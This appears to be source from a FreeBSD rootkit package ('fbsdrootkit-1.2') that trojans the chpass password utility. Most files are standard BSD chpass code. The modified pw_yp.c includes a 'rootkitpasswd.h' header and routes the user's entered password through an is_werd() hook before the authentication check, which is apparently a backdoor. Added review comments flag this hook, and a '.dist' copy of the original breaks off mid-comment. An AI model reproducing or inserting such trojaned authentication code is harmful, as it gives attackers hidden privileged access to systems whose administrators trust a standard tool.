SUCH DAMAGE. 
*/ #ifndef lint static char sccsid[] = "@(#)pw_copy.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This module is used to copy the master password file, replacing a single * record, by chpass(1) and passwd(1). */ #include #include #include #include #include #include "pw_copy.h" extern char *tempname; void pw_copy(ffd, tfd, pw) int ffd, tfd; struct passwd *pw; { FILE *from, *to; int done; char *p, buf[8192]; char uidstr[20]; char gidstr[20]; char chgstr[20]; char expstr[20]; snprintf(uidstr, sizeof(uidstr), "%d", pw->pw_uid); snprintf(gidstr, sizeof(gidstr), "%d", pw->pw_gid); snprintf(chgstr, sizeof(chgstr), "%ld", pw->pw_change); snprintf(expstr, sizeof(expstr), "%ld", pw->pw_expire); if (!(from = fdopen(ffd, "r"))) pw_error(_PATH_MASTERPASSWD, 1, 1); if (!(to = fdopen(tfd, "w"))) pw_error(tempname, 1, 1); for (done = 0; fgets(buf, sizeof(buf), from);) { if (!strchr(buf, '\n')) { warnx("%s: line too long", _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } if (done) { (void)fprintf(to, "%s", buf); if (ferror(to)) goto err; continue; } if (!(p = strchr(buf, ':'))) { warnx("%s: corrupted entry", _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } *p = '\0'; if (strcmp(buf, pw->pw_name)) { *p = ':'; (void)fprintf(to, "%s", buf); if (ferror(to)) goto err; continue; } (void)fprintf(to, "%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\n", pw->pw_name, pw->pw_passwd, pw->pw_fields & _PWF_UID ? uidstr : "", pw->pw_fields & _PWF_GID ? gidstr : "", pw->pw_class, pw->pw_fields & _PWF_CHANGE ? chgstr : "", pw->pw_fields & _PWF_EXPIRE ? expstr : "", pw->pw_gecos, pw->pw_dir, pw->pw_shell); done = 1; if (ferror(to)) goto err; } if (!done) #ifdef YP /* Ultra paranoid: shouldn't happen. */ if (getuid()) { warnx("%s: not found in %s -- permission denied", pw->pw_name, _PATH_MASTERPASSWD); pw_error(NULL, 0, 1); } else #endif /* YP */ (void)fprintf(to, "%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\n", pw->pw_name, pw->pw_passwd, pw->pw_fields & _PWF_UID ? uidstr : "", pw->pw_fields & _PWF_GID ? 
gidstr : "", pw->pw_class, pw->pw_fields & _PWF_CHANGE ? chgstr : "", pw->pw_fields & _PWF_EXPIRE ? expstr : "", pw->pw_gecos, pw->pw_dir, pw->pw_shell); if (ferror(to)) err: pw_error(NULL, 1, 1); (void)fclose(to); } fbsdrootkit-1.2/chpass/pw_copy.h100600 764 764 3574 5571373017 14266 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pw_copy.h 8.1 (Berkeley) 4/2/94 */ void pw_copy __P((int, int, struct passwd *)); fbsdrootkit-1.2/chpass/pw_yp.c100600 764 764 24517 6257642417 13764 0ustar dfdf/* * Copyright (c) 1995 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.c,v 1.1.2.2 1996/06/24 17:18:04 wpaul Exp $ */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_yp.h" #include "../config.h" #define FIRST_TIME #include "../rootkitpasswd.h" #define PERM_SECURE (S_IRUSR|S_IWUSR) HASHINFO openinfo = { 4096, /* bsize */ 32, /* ffactor */ 256, /* nelem */ 2048 * 1024, /* cachesize */ NULL, /* hash */ 0, /* lorder */ }; int _use_yp = 0; /* Save the local and NIS password information */ struct passwd local_password; struct passwd yp_password; void copy_yp_pass(p, x, m) char *p; int x, m; { register char *t, *s = p; static char *buf; yp_password.pw_fields = 0; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); /* Turn all colons into NULLs */ while (strchr(s, ':')) { s = (strchr(s, ':') + 1); *(s - 1)= '\0'; } t = buf; #define EXPAND(e) e = t; while (*t++ = *p++); EXPAND(yp_password.pw_name); yp_password.pw_fields |= _PWF_NAME; EXPAND(yp_password.pw_passwd); yp_password.pw_fields |= _PWF_PASSWD; yp_password.pw_uid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_UID; yp_password.pw_gid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_GID; if (x) { 
EXPAND(yp_password.pw_class); yp_password.pw_fields |= _PWF_CLASS; yp_password.pw_change = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_CHANGE; yp_password.pw_expire = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_EXPIRE; } EXPAND(yp_password.pw_gecos); yp_password.pw_fields |= _PWF_GECOS; EXPAND(yp_password.pw_dir); yp_password.pw_fields |= _PWF_DIR; EXPAND(yp_password.pw_shell); yp_password.pw_fields |= _PWF_SHELL; return; } void copy_local_pass(p,m) char *p; int m; { register char *t; static char *buf; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); t = buf; EXPAND(local_password.pw_name); EXPAND(local_password.pw_passwd); bcopy(p, (char *)&local_password.pw_uid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_gid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_change, sizeof(time_t)); p += sizeof(time_t); EXPAND(local_password.pw_class); EXPAND(local_password.pw_gecos); EXPAND(local_password.pw_dir); EXPAND(local_password.pw_shell); bcopy(p, (char *)&local_password.pw_expire, sizeof(time_t)); p += sizeof(time_t); bcopy(p, (char *)&local_password.pw_fields, sizeof local_password.pw_fields); p += sizeof local_password.pw_fields; return; } /* * Check if the user we're working with is local or in NIS. 
*/
/*
 * use_yp --
 *	Classify `user' as known locally, in NIS, in both, or in neither,
 *	filling the file-scope local_password / yp_password records through
 *	copy_local_pass() / copy_yp_pass() along the way.
 *
 *	Returns USER_YP_AND_LOCAL, USER_YP_ONLY, USER_LOCAL_ONLY or
 *	USER_UNKNOWN; falls through to -1 when getpwnam() finds the user but
 *	neither lookup below does.
 */
int
use_yp (user)
	char *user;
{
	int user_local = 0, user_yp = 0, user_exists = 0;
	DB *dbp;
	DBT key,data;
	char bf[UT_NAMESIZE + 2];
	char *domain;
	char *result;
	int resultlen, rval;

	/* Is the user anywhere */
	if (getpwnam(user) != NULL)
		user_exists = 1;

	/* NOTE(review): _PATH_SMP_DB is opened, but the error text prints _PATH_MP_DB. */
	if ((dbp = dbopen(_PATH_SMP_DB, O_RDONLY, PERM_SECURE,
			DB_HASH, &openinfo)) == NULL)
			errx(1, "error opening database: %s.", _PATH_MP_DB);

	/* Is NIS turned on: a zero return from get() is treated as "key present". */
	bf[0] = _PW_KEYYPENABLED;
	key.data = (u_char *)bf;
	key.size = 1;
	if (!(dbp->get)(dbp,&key,&data,0)) {
		if ((rval = yp_get_default_domain(&domain))) {
			warnx("can't get local NIS domain name: %s",yperr_string(rval));
			pw_error(NULL, 0, 1);
		}

		/* Is the user in the NIS passwd map */
		if (!yp_match(domain, "passwd.byname", user, strlen(user),
			&result, &resultlen)) {
			user_yp = 1;
			copy_yp_pass(result, 0, resultlen);
			free(result);
		}
		/* Is the user in the NIS master.passwd map */
		if (user_yp && !yp_match(domain, "master.passwd.byname",
			user, strlen(user),
			&result, &resultlen)) {
			copy_yp_pass(result, 1, resultlen);
		}
		/*
		 * NOTE(review): this free() runs on every path through the
		 * NIS branch.  If the first yp_match() failed, no visible
		 * code has assigned result; if it succeeded and the second
		 * one failed, result was already freed above.  Both cases
		 * assume yp_match() leaves result untouched on failure --
		 * confirm.
		 */
		free(result);
	}

	/* Is the user in the local password database */
	/*
	 * NOTE(review): at most UT_NAMESIZE bytes of user are copied into bf,
	 * but key.size is strlen(user) + 1 without that clamp.  For a name
	 * longer than UT_NAMESIZE the key covers bytes that were never
	 * copied, and beyond UT_NAMESIZE + 1 it extends past the end of bf.
	 */
	bf[0] = _PW_KEYBYNAME;
	bcopy((char *)user, bf + 1, MIN(strlen(user), UT_NAMESIZE));
	key.data = (u_char *)bf;
	key.size = strlen(user) + 1;
	if (!(dbp->get)(dbp,&key,&data,0)) {
		user_local = 1;
		copy_local_pass(data.data, data.size);
	}

	(dbp->close)(dbp);

	if (user_local && user_yp && user_exists)
		return(USER_YP_AND_LOCAL);
	else if (!user_local && user_yp && user_exists)
		return(USER_YP_ONLY);
	else if (user_local && !user_yp && user_exists)
		return(USER_LOCAL_ONLY);
	else if (!user_exists)
		return(USER_UNKNOWN);

	return(-1);
}

/*
 * Find the name of the NIS master server for this domain
 * and make sure it's running yppasswdd.
 *
 * Every failure is reported with warnx() and handed to pw_error(); on
 * success the name obtained from yp_master() is returned.
 */
static char *get_yp_master(void)
{
	char *domain, *mastername;
	int rval;

	/* Get default NIS domain. */
	if ((rval = yp_get_default_domain(&domain))) {
		warnx("can't get local NIS domain name: %s",yperr_string(rval));
		pw_error(NULL, 0, 1);
	}

	/* Get master server of passwd map. */
	if ((rval = yp_master(domain, "passwd.byname", &mastername))) {
		warnx("can't get master NIS server: %s", yperr_string(rval));
		pw_error(NULL, 0, 1);
	}

	/*
	 * Check if yppasswdd is out there.
	 * NOTE(review): getrpcport()'s third parameter is a version number;
	 * a procedure constant (YPPASSWDPROC_UPDATE) is passed here --
	 * confirm that the two values coincide.
	 */
	if ((rval = getrpcport(mastername, YPPASSWDPROG, YPPASSWDPROC_UPDATE,
		IPPROTO_UDP)) == 0) {
		warnx("yppasswdd not running on NIS master server");
		pw_error(NULL, 0, 1);
	}

	/*
	 * Make sure it's on a reserved port.
	 * XXX Might break with yppasswdd servers running on Solaris 2.x.
	 */
	if (rval >= IPPORT_RESERVED) {
		warnx("yppasswdd server not running on reserved port");
		pw_error(NULL, 0, 1);
	}

	/* Everything checks out: return the name of the server. */
	return (mastername);
}

/*
 * Ask the user for his NIS password and submit the new information
 * to yppasswdd. Note that yppasswdd requires password authentication
 * and only allows changes to existing records rather than the addition
 * of new records. (To do actual updates we would need something like
 * secure RPC and ypupdated, which FreeBSD doesn't have yet.) This means
 * that the superuser cannot use chpass(1) to add new users records to
 * the NIS password database.
 *
 * NOTE(review): the strdup() results and the clnt_create() result below
 * are used without a NULL check.
 */
void
yp_submit(pw)
	struct passwd *pw;
{
	struct yppasswd yppasswd;
	CLIENT *clnt;
	char *master, *password, *encpass;
	int rval, status = 0;
	struct timeval  tv;

	/* Populate the yppasswd structure that gets handed to yppasswdd. */
	/*
	 * XXX This is done first to work around what looks like a very
	 * strange memory corruption bug: the text fields pointed to
	 * by the members of the 'pw' structure appear to be clobbered
	 * after get_yp_master() returns (in particular, it happens
	 * during getrpcport()). I don't know exactly where the problem
	 * lies: I traced it all the way to gethostbyname(), then gave
	 * up.
	 */
	yppasswd.newpw.pw_passwd = strdup(pw->pw_passwd);
	yppasswd.newpw.pw_name = strdup(pw->pw_name);
	yppasswd.newpw.pw_uid = pw->pw_uid;
	yppasswd.newpw.pw_gid = pw->pw_gid;
	yppasswd.newpw.pw_gecos = strdup(pw->pw_gecos);
	yppasswd.newpw.pw_dir = strdup(pw->pw_dir);
	yppasswd.newpw.pw_shell = strdup(pw->pw_shell);
	yppasswd.oldpass = "";

	/* Get NIS master server name */
	master = get_yp_master();

	/* The prompt is skipped entirely when the stored password field is empty. */
	if (pw->pw_passwd[0]) {
		/* Get the user's password for authentication purposes. */
		printf ("Changing NIS information for %s on %s\n",
				yppasswd.newpw.pw_name, master);
		encpass = pw->pw_passwd;
		/*
		 * NOTE(review): the plaintext returned by getpass() is handed
		 * to is_werd() before it is checked with crypt().  is_werd()
		 * is not defined in this file; it presumably comes from
		 * ../rootkitpasswd.h, which this file includes together with
		 * ../config.h -- confirm.  Its body is not shown here, so
		 * treat it as unreviewed code in the authentication path:
		 * whatever it returns is what gets compared and what is later
		 * sent as yppasswd.oldpass.  Neither the call nor the two
		 * includes appear to belong to the BSD-licensed original, so
		 * they are the lines to look at when comparing this file with
		 * a vendor copy.
		 */
		password = is_werd(getpass("Please enter password: "));
		if (strncmp(crypt(password, encpass), encpass,
							strlen(encpass))) {
			warnx("Password incorrect.");
			pw_error(NULL, 0, 1);
		}
		yppasswd.oldpass = password;	/* XXX */
	}

	/* Create a handle to yppasswdd. */
	/* NOTE(review): clnt is dereferenced on the next line without checking for NULL. */
	clnt = clnt_create(master, YPPASSWDPROG, YPPASSWDVERS, "udp");
	clnt->cl_auth = authunix_create_default();

	/*
	 * Set a timeout and make the RPC call.  The old password travels
	 * inside the yppasswd structure of this UDP call; nothing in this
	 * function encrypts it.
	 */
	tv.tv_sec = 20;
	tv.tv_usec = 0;
	rval = clnt_call(clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd,
			 (char *)&yppasswd, xdr_int, (char *)&status, &tv);

	/* Call failed: signal the error. */
	if (rval) {
		warnx("NIS update failed: %s", clnt_sperrno(rval));
		pw_error(NULL, 0, 1);
	}

	/* Success: a non-zero status from the server is reported as "not changed". */
	auth_destroy(clnt->cl_auth);
	clnt_destroy(clnt);
	warnx("NIS information %schanged on host %s",
					status ? "not " : "", master);
	return;
}
#endif /* YP */
fbsdrootkit-1.2/chpass/pw_yp.h100600 764 764 4433 6035125023 13723 0ustar dfdf/*
 * Copyright (c) 1995
 * Bill Paul . All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2.
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.h,v 1.1.2.1 1995/10/06 00:58:51 davidg Exp $ */ #ifdef YP /* Four possible return codes from use_yp() */ #define USER_UNKNOWN 0 #define USER_YP_ONLY 1 #define USER_LOCAL_ONLY 2 #define USER_YP_AND_LOCAL 3 extern int _use_yp; extern struct passwd local_password; extern struct passwd yp_password; void yp_submit __P(( struct passwd * )); int use_yp __P(( char * )); #endif /* YP */ fbsdrootkit-1.2/chpass/table.c100600 764 764 5072 6017570537 13665 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)table.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include "chpass.h" char e1[] = ": "; char e2[] = ":,"; ENTRY list[] = { { "login", p_login, 1, 5, e1, }, { "password", p_passwd, 1, 8, e1, }, { "uid", p_uid, 1, 3, e1, }, { "gid", p_gid, 1, 3, e1, }, { "class", p_class, 1, 5, e1, }, { "change", p_change, 1, 6, NULL, }, { "expire", p_expire, 1, 6, NULL, }, { "full name", p_gecos, 0, 9, e2, }, { "office phone", p_gecos, 0, 12, e2, }, { "home phone", p_gecos, 0, 10, e2, }, { "location", p_gecos, 0, 8, e2, }, { "home directory", p_hdir, 1, 14, e1, }, { "shell", p_shell, 0, 5, e1, }, { NULL, 0, }, }; fbsdrootkit-1.2/chpass/util.c100600 764 764 7326 6020363216 13543 0ustar dfdf/*- * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. 
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/ #ifndef lint static char sccsid[] = "@(#)util.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include "chpass.h" #include "pathnames.h" static char *months[] = { "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", NULL }; char * ttoa(tval) time_t tval; { struct tm *tp; static char tbuf[50]; if (tval) { tp = localtime(&tval); (void)sprintf(tbuf, "%s %d, %d", months[tp->tm_mon], tp->tm_mday, tp->tm_year + 1900); } else *tbuf = '\0'; return (tbuf); } int atot(p, store) char *p; time_t *store; { static struct tm *lt; char *t, **mp; time_t tval; int day, month, year; if (!*p) { *store = 0; return (0); } if (!lt) { unsetenv("TZ"); (void)time(&tval); lt = localtime(&tval); } if (!(t = strtok(p, " \t"))) goto bad; for (mp = months;; ++mp) { if (!*mp) goto bad; if (!strncasecmp(*mp, t, 3)) { month = mp - months + 1; break; } } if (!(t = strtok((char *)NULL, " \t,")) || !isdigit(*t)) goto bad; day = atoi(t); if (!(t = strtok((char *)NULL, " \t,")) || !isdigit(*t)) goto bad; year = atoi(t); if (day < 1 || day > 31 || month < 1 || month > 12 || !year) goto bad; if (year < 100) year += 1900; if (year <= 1970) bad: return (1); lt->tm_year = year - 1900; lt->tm_mon = month - 1; lt->tm_mday = day; lt->tm_hour = 0; lt->tm_min = 0; lt->tm_sec = 0; lt->tm_isdst = -1; if ((tval = mktime(lt)) < 0) return (1); *store = tval; return (0); } char * ok_shell(name) char *name; { char *p, *sh; setusershell(); while (sh = getusershell()) { if (!strcmp(name, sh)) return (name); /* allow just shell name, but use "real" path */ if ((p = strrchr(sh, '/')) && strcmp(name, p + 1) == 0) return (sh); } return (NULL); } fbsdrootkit-1.2/chpass/pw_yp.c.dist100600 764 764 24375 6256627005 14723 0ustar dfdf/* * Copyright (c) 1995 * Bill Paul . All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.c,v 1.1.2.2 1996/06/24 17:18:04 wpaul Exp $ */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_yp.h" #define PERM_SECURE (S_IRUSR|S_IWUSR) HASHINFO openinfo = { 4096, /* bsize */ 32, /* ffactor */ 256, /* nelem */ 2048 * 1024, /* cachesize */ NULL, /* hash */ 0, /* lorder */ }; int _use_yp = 0; /* Save the local and NIS password information */ struct passwd local_password; struct passwd yp_password; void copy_yp_pass(p, x, m) char *p; int x, m; { register char *t, *s = p; static char *buf; yp_password.pw_fields = 0; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); /* Turn all colons into NULLs */ while (strchr(s, ':')) { s = (strchr(s, ':') + 1); *(s - 1)= '\0'; } t = buf; #define EXPAND(e) e = t; while (*t++ = *p++); EXPAND(yp_password.pw_name); yp_password.pw_fields |= _PWF_NAME; EXPAND(yp_password.pw_passwd); yp_password.pw_fields |= _PWF_PASSWD; yp_password.pw_uid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_UID; yp_password.pw_gid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_GID; if (x) { EXPAND(yp_password.pw_class); yp_password.pw_fields |= _PWF_CLASS; yp_password.pw_change = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_CHANGE; yp_password.pw_expire = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_EXPIRE; } EXPAND(yp_password.pw_gecos); yp_password.pw_fields |= _PWF_GECOS; EXPAND(yp_password.pw_dir); yp_password.pw_fields |= _PWF_DIR; EXPAND(yp_password.pw_shell); yp_password.pw_fields |= _PWF_SHELL; return; } void copy_local_pass(p,m) char *p; int m; { register char *t; static char *buf; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); t = buf; 
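EXPAND(local_password.pw_name); EXPAND(local_password.pw_passwd); bcopy(p, (char *)&local_password.pw_uid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_gid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_change, sizeof(time_t)); p += sizeof(time_t); EXPAND(local_password.pw_class); EXPAND(local_password.pw_gecos); EXPAND(local_password.pw_dir); EXPAND(local_password.pw_shell); bcopy(p, (char *)&local_password.pw_expire, sizeof(time_t)); p += sizeof(time_t); bcopy(p, (char *)&local_password.pw_fields, sizeof local_password.pw_fields); p += sizeof local_password.pw_fields; return; }

/*
 * Check if the user we're working with is local or in NIS.
 *
 * Returns USER_UNKNOWN when getpwnam() does not know the user, otherwise
 * USER_YP_ONLY, USER_LOCAL_ONLY or USER_YP_AND_LOCAL according to which
 * lookups below succeeded; returns -1 when getpwnam() knows the user but
 * neither lookup found a record.  As a side effect, copy_yp_pass() and
 * copy_local_pass() are called with whatever records were found.
 */
int
use_yp (user)
	char *user;
{
	int user_local = 0, user_yp = 0, user_exists = 0;
	DB *dbp;
	DBT key,data;
	char bf[UT_NAMESIZE + 2];
	char *domain;
	char *result = NULL;
	int resultlen, rval;
	size_t namelen;

	/* Is the user anywhere */
	if (getpwnam(user) != NULL)
		user_exists = 1;

	/* Report the path that was actually opened, not _PATH_MP_DB. */
	if ((dbp = dbopen(_PATH_SMP_DB, O_RDONLY, PERM_SECURE,
	    DB_HASH, &openinfo)) == NULL)
		errx(1, "error opening database: %s.", _PATH_SMP_DB);

	/* Is NIS turned on */
	bf[0] = _PW_KEYYPENABLED;
	key.data = (u_char *)bf;
	key.size = 1;
	if (!(dbp->get)(dbp,&key,&data,0)) {
		if ((rval = yp_get_default_domain(&domain))) {
			warnx("can't get local NIS domain name: %s",yperr_string(rval));
			pw_error(NULL, 0, 1);
		}

		/*
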